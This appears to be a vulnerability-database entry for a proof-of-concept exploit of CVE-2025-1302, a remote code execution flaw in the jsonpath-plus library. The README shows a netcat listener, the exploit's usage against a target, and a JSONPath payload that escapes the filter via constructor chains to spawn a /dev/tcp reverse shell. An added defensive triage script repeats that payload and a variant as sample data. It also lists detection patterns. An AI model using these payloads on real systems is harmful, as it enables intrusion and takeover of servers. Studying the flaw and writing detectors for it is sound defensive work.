PoC details: d156ca8a63881b4a9a3db53db8332072774dc949

Source
Related vulnerability
Title: JSONPath Plus security vulnerability (CVE-2025-1302)
Description: JSONPath Plus is an open-source library from the JSONPath Plus project. Versions of JSONPath Plus before 10.3.0 contain a security vulnerability that stems from improper input sanitization and an unsafe default evaluation mode; it can lead to remote code execution. Versions 10.3.0 and later are fixed.
Description
PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
Introduction
## CVE-2025-1302 JSONPath-Plus RCE PoC

**PoC Script Name:** `poc.py`

A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the `jsonpath-plus` library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.

---

### Features

* **Flexible HTTP methods**: Supports **POST**, **GET**, or **AUTO** (POST with GET fallback) via `--method` or `--no-fallback` flags.
* **Custom payloads**: Load one or more JSONPath RCE payload templates from a file, with `{ip}` and `{port}` templating.
* **Built-in default payload**: If no payload file is provided, uses a fully-formed bash reverse shell template.
* **Verbose debugging**: Prints full request/response bodies for both POST and GET attempts when they fail.
* **Progress indicators**: Displays delay and payload loops with `tqdm` progress bars.
* **Logging**: Optionally save all results to a JSON file with `--output`.

### Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/yourorg/jsonpath-rce-poc.git
   cd jsonpath-rce-poc
   ```

2. Install dependencies (requires Python 3.6+):

   ```bash
   pip install -r requirements.txt
   ```

### Usage

1. Start a listener on your attacker machine (replace port as needed):

   ```bash
   nc -lvnp 9999
   ```

2. Run the PoC:

   ```bash
   python3 poc.py \
     --url http://TARGET_HOST:PORT/query \
     --ip ATTACKER_IP --port 9999 \
     [--payload-file payloads.txt] \
     [--delay 5] \
     [--method AUTO|POST|GET] \
     [--no-fallback] \
     [--output results.json]
   ```

* **`--payload-file`**: File containing one JSONPath payload per line. Use `{ip}` and `{port}` placeholders.
* **`--delay`**: Seconds to wait before sending payloads (shows countdown).
* **`--method`**: Force `POST`, `GET`, or `AUTO` (default).
* **`--no-fallback`**: Shorthand to skip any GET retry (equivalent to `--method POST`).
* **`--output`**: Path to save JSON log of attempts.

### Example Payload File

```text
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
```
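The payload above is a legitimate-looking filter expression whose body climbs out of the filter's evaluation scope through `constructor.constructor` to reach `Function`, and from there `require`/`child_process`. For the defensive side, here is an added example (not from the repository): a triage check that separates ordinary filter expressions such as `$..book[?(@.price<10)]` from ones carrying those escape indicators, run over constructed log lines. The log formats, the `/query` endpoint and the `path` parameter name are assumptions, and the sample lines are made up for the demo.

```python
"""Added example (not from the repository): triage of JSONPath strings seen
at an endpoint like the PoC's /query. Distinguishes ordinary filter syntax
from expressions that escape the filter scope via constructor chains.
Assumptions: the two log formats, the /query endpoint and the 'path' param.
Sample log lines are constructed, not real traffic."""
import json
import re
from urllib.parse import unquote_plus, urlencode

# Indicators of scope escape or command execution inside a filter. A '?(...)'
# filter without any of these is ordinary JSONPath. Bracket access
# (@["constructor"]["constructor"]) and whitespace are tolerated; string
# building or unicode escapes will evade this, so it is a triage aid, not a
# substitute for upgrading the library.
ESCAPE_PATTERNS = [
    ("constructor_chain", re.compile(r"constructor\W{1,6}constructor")),
    ("function_ctor", re.compile(r"\bFunction\s*\(")),
    ("require", re.compile(r"\brequire\s*\(")),
    ("child_process", re.compile(r"child_process")),
    ("process_internals", re.compile(r"\b(mainModule|process\s*\.\s*(binding|env))\b")),
    ("dynamic_import", re.compile(r"\bimport\s*\(")),
    ("dev_tcp", re.compile(r"/dev/tcp/")),
]
FILTER_RE = re.compile(r"\?\s*\(")  # filter expression ?( ... )
SCRIPT_RE = re.compile(r"\[\s*\(")  # script expression [( ... )]


def classify_jsonpath(expr):
    """Report which evaluated syntax the expression uses and which indicators fire."""
    return {
        "has_filter": bool(FILTER_RE.search(expr)),
        "has_script": bool(SCRIPT_RE.search(expr)),
        "indicators": [name for name, rx in ESCAPE_PATTERNS if rx.search(expr)],
    }


ACCESS_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/1\.[01]"')


def extract_jsonpath(line, param="path"):
    """Pull the JSONPath out of one log line. Two constructed formats: an
    access-log line whose GET query string carries it percent-encoded (the
    PoC's GET fallback), or a JSON application-log line with the POST body."""
    line = line.strip()
    if line.startswith("{"):
        try:
            return json.loads(line).get("body", {}).get(param)
        except ValueError:
            return None
    m = ACCESS_RE.search(line)
    if not m or "?" not in m.group("target"):
        return None
    for pair in m.group("target").split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == param:
            return unquote_plus(value)  # undo the client's urlencode
    return None


def triage(lines):
    """One (verdict, expression, indicators) tuple per line carrying a JSONPath."""
    out = []
    for line in lines:
        expr = extract_jsonpath(line)
        if expr is None:
            continue
        c = classify_jsonpath(expr)
        if c["indicators"]:
            verdict = "escape"
        elif c["has_filter"] or c["has_script"]:
            verdict = "filter"
        else:
            verdict = "plain"
        out.append((verdict, expr, c["indicators"]))
    return out


# Constructed sample traffic: the README's payload with ip/port filled in,
# plus a bracket-access variant that avoids the literal '.constructor.' chain.
RCE_PAYLOAD = ('$[?(@.constructor.constructor("require(\\"child_process\\")'
               '.execSync(\\"bash -i >& /dev/tcp/10.0.0.5/9999 0>&1\\")")())]')
BRACKET_VARIANT = '$[?(@["constructor"]["constructor"]("return process")().mainModule)]'


def _access(expr):
    return f'127.0.0.1 - - [01/Jan/2025:00:00:00 +0000] "GET /query?{urlencode({"path": expr})} HTTP/1.1" 200 17'


SAMPLE_LOG = [
    _access("$.store.book[*].author"),
    _access("$.store.book[?(@.price<10)].title"),
    _access(RCE_PAYLOAD),
    json.dumps({"method": "POST", "url": "/query", "body": {"path": BRACKET_VARIANT}}),
]

if __name__ == "__main__":
    for verdict, expr, hits in triage(SAMPLE_LOG):
        print(f"{verdict:7} {hits} {expr[:60]}")
```

Decoding before matching matters: the GET form of the payload reaches the log as `%24%5B%3F%28%40.constructor...`, so a pattern applied to the raw line would miss the parentheses and quotes but still see `constructor.constructor`; other indicators such as `/dev/tcp/` are fully encoded and only appear after `unquote_plus`.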

### Contribution

1. Fork the repo and create a feature branch.
2. Submit a pull request with your changes.

### Disclaimer

Use this script **only** in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.
File snapshot

```text
[4.0K] /data/pocs/d156ca8a63881b4a9a3db53db8332072774dc949
├── [1.0K] LICENSE
├── [ 289] package.json
├── [4.4K] poc.py
└── [2.4K] README.md

0 directories, 4 files
```